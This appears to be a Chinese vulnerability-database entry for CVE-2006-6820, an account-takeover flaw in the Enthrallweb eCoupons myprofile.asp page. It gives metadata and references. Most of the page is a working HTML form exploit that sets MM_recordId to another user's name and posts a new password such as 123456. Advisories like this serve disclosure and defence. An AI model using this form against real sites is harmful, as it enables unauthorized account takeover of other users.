Enthrallweb eCoupons 'Myprofile.ASP'任意用户密码变更漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111835 漏洞类型 设计错误
发布时间 2006-12-23 更新时间 2007-01-02
CVE编号 CVE-2006-6820 CNNVD-ID CNNVD-200612-598
漏洞平台 ASP CVSS评分 3.5
|漏洞来源
https://www.exploit-db.com/exploits/2995
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-598
|漏洞详情
EnthrallwebeCoupons中的myprofile.asp在更新概要文件时未正确验证MM_recordId参数,远程认证用户可通过在MM_recordId参数内指定另一个账号的用户名来修改该账号的特定概要文件字段。
|漏洞EXP
<form action="[target]/myprofile.asp" method="POST" name="form2">
                          <p> </p>
                          <table align="center" cellpadding="1" cellspacing="1">
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">PASSWORD:</font></strong></td>
Change Profile UserName=><input type="text" name="MM_recordId" value="ajann">
                              <td> <input type="text" name="U_PASSWORD" value="123456" size="35" maxlength="10" class="inputFieldIE"> 
                              </td>
                            </tr>

                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">FIRST:</font></strong></td>
                              <td> <input type="text" name="U_FIRST" value="000245" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">LAST:</font></strong></td>
                              <td> <input type="text" name="U_LAST" value="000245" size="35" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">ADDRESS:</font></strong></td>
                              <td> <input type="text" name="U_ADDRESS" value="" class="inputFieldIE" size="35"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">CITY/TOWN:</font></strong></td>
                              <td> <input type="text" name="U_CITY" value="" size="35" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">STATE/PROVINCE:</font></strong></td>
                              <td> <input type="text" name="U_STATE" value="" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">ZIP/POSTAL:</font></strong></td>
                              <td> <input type="text" name="U_ZIP" value="" size="35" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">EMAIL:</font></strong></td>
                              <td> <input type="text" name="U_EMAIL" value="ajannhwt@hotmail.com" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">PHONE:</font></strong></td>
                              <td> <input type="text" name="U_PHONE" value="" size="35" maxlength="15" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">FAX:</font></strong></td>
                              <td> <font size="1"> <i> <font face="Verdana, Arial, Helvetica, sans-serif"> 
                                </font><font size="1"><i><font face="Verdana, Arial, Helvetica, sans-serif"> 
                                <input type="text" name="U_FAX" value="" size="35" maxlength="15" class="inputFieldIE">
                                </font></i></font><font face="Verdana, Arial, Helvetica, sans-serif">(Optional)</font></i></font> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">RECEIVE 
                                NEWS</font></strong></td>
                              <td> <input checked name="subscribe" type="checkbox" id="subscribe" value="checkbox"> 
                                <span class="content"> (LEAVE EMPTY TO UNSUBSCIBE)</span></td>
                            </tr>
                            <tr valign="baseline"> 
                              <td height="44" align="right" nowrap><font color="#333333"> </font></td>

                              <td> <input  name="submit" type="submit" class="Buttons" onClick="MM_validateForm('U_FIRST','','R','U_LAST','','R','U_ADDRESS','','R','U_CITY','','R','U_STATE','','R','U_ZIP','','R','U_EMAIL','','RisEmail','U_PHONE','','R','U_PASSWORD','','R');return document.MM_returnValue" value="Update"> 
                              </td>
                            </tr>
                          </table>
                          <input type="hidden" name="MM_update" value="form2">
                          
                        </form>

# milw0rm.com [2006-12-23]
|参考资料

来源:MILW0RM
名称:2995
链接:http://www.milw0rm.com/exploits/2995
来源:VUPEN
名称:ADV-2006-5155
链接:http://www.frsirt.com/english/advisories/2006/5155
来源:SECUNIA
名称:23517
链接:http://secunia.com/advisories/23517
来源:BID
名称:21739
链接:http://www.securityfocus.com/bid/21739
来源:MILW0RM
名称:2995
链接:http://milw0rm.com/exploits/2995